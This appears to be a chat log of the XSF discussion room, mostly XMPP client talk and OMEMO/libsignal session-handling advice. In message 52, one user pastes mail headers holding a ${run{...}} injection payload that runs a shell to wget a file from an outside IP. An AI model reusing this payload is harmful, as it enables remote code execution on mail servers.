XSF Discussion - 2019-06-27

  1. edhelas


  2. adityaborikar

    edhelas: thumbsup !

  3. edhelas

    related HN thread https://news.ycombinator.com/item?id=20291889#20292122

  4. edhelas

    if you guys wants to reply

  5. Yagiza

    Daniel, are you here?

  6. Daniel

    Yagiza: it's probably better if you just ask your question since there are other people in here who can answer them as well

  7. Daniel

    As lovetox demonstrated yesterday

  8. Yagiza

    Daniel, ok

  9. Yagiza

    So, once session_cipher is created, I don't need session_builder anymore?

  10. rion

    Is it possible to add Psi here https://xmpp.org/getting-started/ ?

  11. rion

    ah there is a list on another page. ok.

  12. Zash

    https://xmpp.org/software/clients.html ?

  13. rion

    so the first list is discriminating all other clients :)

  14. Zash

    It would be nice if there were more detailed getting-started tutorials, with pictures and stuff. Maybe you could do one for Psi?

  15. Zash

    "get a client, get an account, done!" seems a bit bare

  16. Zash

    Let's not have another fight over this page 😕

  17. jonas’

    maybe clients should make tutorials superfluous by having proper onboarding

  18. jonas’

    with server lists and stuff

  19. jonas’

    and then we can make it a criterium for a client to have that type of flow to be listed on getting_started

  20. jonas’

    and Ge0rG can finally get rid of his pidgin

  21. Zash

    I don't see Pidgin there

  22. jonas’

    oh, so that was fixed already

  23. rion

    what's wrong with Pidgin?

  24. jonas’

    lack of support for any modern XMPP feature?

  25. jonas’

    and don’t get me started on plugins

  26. Ge0rG

    tl;dr: everything is wrong

  27. jonas’

    you know, pidgin, the type of client where you have to ask "did you write anything?" when the peer goes off- and online, because it doesn’t have stream management *or* MAM

  28. jonas’

    you know, pidgin, the type of client where you need to make other clients resource-lock to, otherwise you don’t get messages (no carbons)

  29. jonas’

    you know, pidgin, the type of client where you have to consciously log off before switching networks/suspending to not lose messages (again, no SM or MAM)

  30. jonas’

    you know, pidgin, the type of client which has an architecture which makes it easy for crypto plugins to accidentally send plaintext instead of ciphertext when you start a message with "/me"

  31. jonas’

    (I’m stopping now)

  32. pep. deserves its own rant anyway

  33. pep.


  34. jonas’


  35. pep.

    Why poezio.. why..

  36. pep.

    "//me" doesn't even work

  37. jonas’

    it can’t

  38. jonas’

    and you know why :)

  39. jonas’

    that’s why you want to rant about it

  40. jonas’

    you need ///me

  41. pep.


  42. jonas’

    and then everyone will see "//me" :)

  43. pep.

    jonas’, why I have you, can you merge this plz https://github.com/xsf/xmpp.org/pull/582 :)

  44. rion

    Well I always used Pidgin just like a transport for spectrum =)

  45. pep.

    I think there are also horror stories with that

  46. jonas’

    pep., I don’t have github credentials at work

  47. jonas’

    oh, spectrum with libpurple? you know, the IRC transport where you would get disconnected when you sent a message starting with ``/quit`` to the transport?

  48. jonas’

    or was it the transport where you would get disconnected when you sent a multi-line message like: foo QUIT :bar

  49. jonas’

    to get disconnected?

  50. jonas’

    I *am* in a ranty mood today.

  51. rion

    unfortunately Pidgin's Skype integration is full of bugs. That's what I needed at most last time.

  52. neshtaxmpp

    moparisbest: someone comment or number ip is not importamr and this is LIE. today mi friend comment someone connect from and send this: Return-Path: <root@1ur.com> X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@yourdomain.com Delivered-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@yourdomain.com Received: from localhost (localhost []) by yourdomain.com (Postfix) with ESMTP id A94DBA00B30 for <root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@yourdomain.con>; Wed, 26 Jun 2019 02:58:45 +0200 (CEST) X-Quarantine-ID: <UdVj8nzxJJRS> X-Virus-Scanned: Debian amavisd-new at yourdomain.com X-Amavis-Alert: BAD HEADER SECTION, Missing required header field: "Date" Message-Id: <20190626005845.A94DBA00B30@yourdomain.com> Date: Wed, 26 Jun 2019 02:58:45 +0200 (CEST) From: root@1ur.com

  53. jonas’

    neshtaxmpp, this room is not about email.

  54. neshtaxmpp

    jonas’: it is about sslh and someone try hack my friend server throught sslh. i need someone commment how sslh sopve apache2 to show real ip and block not to be used outside internet.

  55. jonas’

    this room also is not about sslh

  56. jonas’

    or sysadmin in general

  57. vanitasvitae

    neshtaxmpp, tell your fried to visit a local hackerspace to get help, but please do not bother the people in this room about it.

  58. pep.

    vanitasvitae, I wish hackerspaces were as big a thing anywhere else than they are in germany, but it's not the case :(

  59. Daniel

    I'm not entirely sure hackerspaces want to be a replacement for search engines

  60. Zash

    Maybe there's even a support venue for sslh itself.

  61. Seve is on its way to the airport. Crossing fingers for a stable connection

  62. Guus

    Ralph and Matt can't make it.

  63. Guus

    if you're not on a reliable connection, we might as well skip the meeting, unless something important needs to be handled.

  64. Guus

    (assuming that nyco is here, in the first place)

  65. Seve


  66. nyco

    good guess

  67. Guus

    do we skip this meeting or not?

  68. nyco

    let me check the board

  69. nyco

    followup on badges is ok, I've not done the poll yet

  70. nyco

    so yes, I think we need more members to really advance

  71. Seve

    I guessed that, yes

  72. Guus

    ok, let's skip this meeting then.

  73. nyco

    three is good from a bylaws standpoint, but imho not enough for debate and decision making

  74. Guus


  75. nyco


  76. nyco

    so, bang, and bang, done, thx all, +1W ;-)

  77. Guus

    have a good flight, Seve 🙂

  78. nyco

    I believe I can flyyyyy

  79. Seve


  80. Guus

    If your pilot sings that: run.

  81. Seve

    Oh... Haha

  82. Seve

    If I hear that, it may be too late

  83. Ge0rG

    Aw, what a pity. I wanted to provide an update regarding the German government contact.

  84. Guus

    Ge0rG - could you do that by mail, if it's longer than 2 sentences?

  85. Guus

    Do you need our input to progress?

  86. Ge0rG

    Guus: yes I can. No input needed so far. Should I write to members@?

  87. Guus

    if it's of interest to the members, yes. Otherwise: did we solve that Board mailing thingy?

  88. Guus


  89. Yagiza


  90. Yagiza

    Where can I get session_cipher to decrypt pre_key_signal_message?

  91. Ge0rG

    Guus: IIRC somebody is now looking for external mail to board@ or somesuch

  92. jonas’

    Ge0rG, Seve typically does that

  93. Guus

    (Who's now in a plane)

  94. Guus

    Ge0rG if you're unsure if it's suitable for members@, mail it to me, and I'll forward it to board@

  95. Ge0rG

    Guus: I'll try to write down something when I have a bit of time. Don't think there are any issues with using members@

  96. Guus


  97. lovetox

    Yagiza, yes session is only once build, after that you load the session from the database and use it to decrypt and encrypt

  98. Yagiza

    lovetox, so, I have different question.

  99. Yagiza

    lovetox, how to generate session_cipher to decrypt pre_key_signal_message?

  100. Yagiza

    Do I have to decrypt it with a key, generated with empty session_builder (before session_builder_process_pre_key_bundle()) call?

  101. lovetox

    hm i cant talk much about the C lib but in the python port

  102. lovetox

    you create a new session_cipher

  103. lovetox

    then use ession_cipher.decryptPkmsg(pre_key_message)

  104. lovetox

    and the decryptPkmsg, does create a new session on its own and saves it to the database

  105. lovetox

    so nothing more to do here

  106. lovetox

    is there something similar in the C version?

  107. lovetox

    there session_cipher_decrypt_pre_key_signal_message

  108. lovetox

    looked it up

  109. lovetox

    it does everything for you

  110. lovetox

    create a new session, store it to the db, decrypt the message

  111. Yagiza

    lovetox, so, after that call, current session is invalidated and new session is created instead?

  112. lovetox


  113. lovetox

    thats also how you refresh a session, you just send a new pkmg

  114. lovetox

    but normally this should not be necessery

  115. Yagiza

    lovetox, do I need to generate new session_cipher after that?

  116. lovetox

    session_cipher is only a wrapper

  117. lovetox

    it does not hold any state itself

  118. lovetox

    you call decrypt or encrypt on it, what it does is it loads the session from the database everytime

  119. lovetox

    you can also recreate it after each message if you want

  120. Yagiza

    lovetox, so, once session is changed, existing session_cipher will use a new session data?

  121. lovetox


  122. lovetox

    i create it on the first message for each contact

  123. lovetox

    and cache it

  124. lovetox

    but you dont have to, you can also create it on every message new, does not make a difference

  125. Yagiza

    lovetox, IC

  126. lovetox

    session is loaded on each message, modified and stored back to database

  127. lovetox

    otherwise it would be highly likely that you have invalid session if your application crashes

  128. lovetox

    so no state is hold in memory

  129. Yagiza

    lovetox, ok

  130. Yagiza

    lovetox, so, I need session_builder only when initiating session. If session initiated by other party, it is created by session_cipher_decrypt_pre_key_signal_message(), right?

  131. lovetox


  132. Yagiza

    lovetox, IC. Thank you.

  133. Yagiza

    lovetox, and the last question.

  134. Yagiza

    lovetox, how do I decide, to which resources of my contact do I need to send encrypted messages, and to which of them not encrypted? Only by checking if it has 'eu.siacs.conversations.axolotl.devicelist+notify' #disco feature?

  135. lovetox


  136. lovetox

    you dont send messages to resources

  137. lovetox

    or better said all messages you send will arrive at all resources of the contact

  138. lovetox

    because of carbons, mam etc

  139. Yagiza

    lovetox, I can't be sure that all of resources of my contact do support OMEMO.

  140. lovetox

    you dont change anything about how you send a message

  141. lovetox

    Yagiza, you can be sure that one device supports it

  142. lovetox

    and thats enough

  143. lovetox

    the user decides if he wants to send encrypted or not

  144. lovetox

    not the client

  145. Yagiza

    lovetox, what do you mean? I have a contact. And I se all of their resources. And I can choose to which of them to send message.

  146. Yagiza

    lovetox, at least, my cliend allows that.

  147. lovetox

    so your client makes the server not save the message in MAM

  148. lovetox


  149. lovetox

    otherwise you cant control who downloads a message from the archive

  150. Yagiza

    lovetox, my client to not support MAM yet.

  151. lovetox

    but the server has

  152. Yagiza

    lovetox, so?

  153. lovetox

    and the server stores all messages in MAM

  154. lovetox

    if you want or not

  155. Yagiza

    lovetox, ok

  156. lovetox

    and other clients will download it

  157. lovetox

    dont assume you can control who gets the message

  158. lovetox

    other than the barejid

  159. lovetox

    you find keys in pep

  160. lovetox

    then you know at least one device of the contact supports it

  161. lovetox

    and afterwards you give your user the decision if he wants to talk encrypted or not

  162. Yagiza

    lovetox, anyway. When I send encrypted message, clients, which do not support OMEMO will just ignore it. When I send unencrypted message, all the clients may read and display it.

  163. lovetox


  164. Yagiza

    And I can't be sure, that my or their server do support MAM.

  165. lovetox

    and you cant know if the user is fine with that

  166. lovetox

    the user maybe totally fine with one of his devices ignoring omemo

  167. lovetox

    and only one device beeing able to decrypt

  168. Yagiza


  169. lovetox

    i just try to save you implementation trouble, you can try to make logic that start and stops encrypting if this and that happens

  170. lovetox

    but i tell you from experience users will come and tell you they want to make the decision themself

  171. lovetox

    especially disco info is useless here

  172. Yagiza

    So, if user enabled OMEMO encryption for a contact, but selected a resource, which do not support it, I must somehow make him aware of the fact and send unencrypted messages in that case.

  173. lovetox

    it only works if a client is online

  174. lovetox

    omemo works also if the contact is offline

  175. lovetox

    dont forget that

  176. Yagiza

    lovetox, yes. That's not a problem.

  177. lovetox

    Yagiza, why do you even have UI where the user selects a resoure

  178. Yagiza

    lovetox, I'm telling only about the sace above.

  179. Yagiza

    lovetox, because that's a good tradition.

  180. lovetox

    if i talk as a user, i dont care how many devices are online of my friend, i just want to send him a message

  181. Yagiza

    lovetox, not all the servers do support MAM or Message Archving or Message Carbons.

  182. lovetox

    Yagiza, then we should tell the admins to upgrade

  183. Yagiza

    So, it's a good thing to have an ability to specify a resource.

  184. lovetox

    i cant help you with that, thats not a usecase for me to write clients for servers from the stoneage

  185. Yagiza

    lovetox, IC. So, you think sending messages to bare JID is a good idea?

  186. lovetox

    Yagiza, thats not what i wanted to say, allthough many devs in the community would answer that question with yes

  187. lovetox

    what i want to say is, that i think its bad UI if you make the user force a resource

  188. lovetox

    because user has to know about what a resource is, that is xmpp protocol stuff

  189. lovetox

    users just want to write messages

  190. lovetox

    and you should no assume only because you adress a message to a resource, that only this resource will get the message

  191. Yagiza

    lovetox, yes, of course.

  192. lovetox

    that is 99% wrong assumption in our current world

  193. jonas’

    send to the bare JID

  194. jonas’

    you’ll be in pain when IM-NG lands otherwise :)

  195. pep.

    When is that :/

  196. pep.

    Any client/server already doing things with it? More than what MattJ said at the summit

  197. jonas’

    I think there was some discussion about that type of stuff the other day

  198. jonas’

    but don’t pin me down on tha

  199. jonas’

    I wish I had time to experiment with things, but so many fires to fight these weeks

  200. pep.

    People in IT always playing with fire..

  201. jonas’


  202. pep.

    Though with the current temperature..

  203. pep.


  204. jonas’

    holy smokes

  205. jonas’

    I feel sorry for you

  206. jonas’

    and I thought we had bad luck with the 38°C yesterday

  207. jonas’

    (dropped to 25°C today)

  208. lovetox

    i dont find the xep that defines dataforms for disco info

  209. lovetox

    ah 128

  210. Yagiza

    And one more question...

  211. Yagiza

    After I processed PreKeySignalMessage, an appropriate pre key is automatically substituted with a new one? So, I only need to refresh the bundle on the PEP server?

  212. lovetox


  213. lovetox

    the prekey which was used, is deleted from the database

  214. lovetox

    but no new keys are generated

  215. lovetox

    you have to do this yourself

  216. lovetox

    and of course you should instantly delete the prekey used from pep

  217. Yagiza

    lovetox, so, I need generate a new key instead of used one? Ok.

  218. lovetox

    you dont have to generate new ones, i mean we publish 100 keys

  219. lovetox

    you can also generate new ones when you reach 90 or something like this

  220. lovetox

    but you have to delete the used one from pep, so you have to push 99 keys anyway

  221. lovetox

    so i would say just generate one and push 100 again

  222. Yagiza

    lovetox, I aware about publishing new bundle of 100 keys.

  223. Yagiza

    lovetox, the only question was about generating a new key instead of used one.

  224. lovetox

    im not following, if a key is used, you only have 99, if you aware that you should have 100 keys

  225. lovetox

    what is there for other option than generate 1 new key?

  226. Yagiza

    lovetox, I didn't know old key is deleted and a new one is generated automatically, or not. So, once you told me that it is deleted, but no new key is generated, I understand, that I only need to generate a new key to replace used one.

  227. lovetox

    ah ok :)

  228. lovetox

    and Yagiza we should move the discussion to xmpp:jdev@conference.jabber.org?join this room is more suited

  229. Yagiza

    lovetox, yes. I tried to ask there, but almost no one replied.

  230. lovetox

    im always joined there :)

  231. Yagiza

    lovetox, me too.

  232. vanitasvitae

    Yagiza: you could take a look at https://blog.jabberhead.tk/2019/04/15/closer-look-at-the-double-ratchet/ to understand the inner workings of the signal protocol.

  233. Yagiza

    vanitasvitae, ok, thank you!

  234. lovetox

    can someone verify that the example here is wrong https://xmpp.org/extensions/xep-0128.html#examples

  235. lovetox

    as it has a field without type which means text-single

  236. lovetox

    but still has multiple <values>

  237. lovetox

    which is a MUST NOT in 0004

  238. lovetox

    or am i missing something

  239. moparisthebest

    jonas’, vanitasvitae: I've tried more than once to help neshtaxmpp by linking him to exactly what he was asking for etc, he's either a troll or beyond help, I just ignore now

  240. pep.

    moparisthebest, yeah I have also given in this domain :)

  241. vanitasvitae

    Yeah I also dealt with him repeatedly :D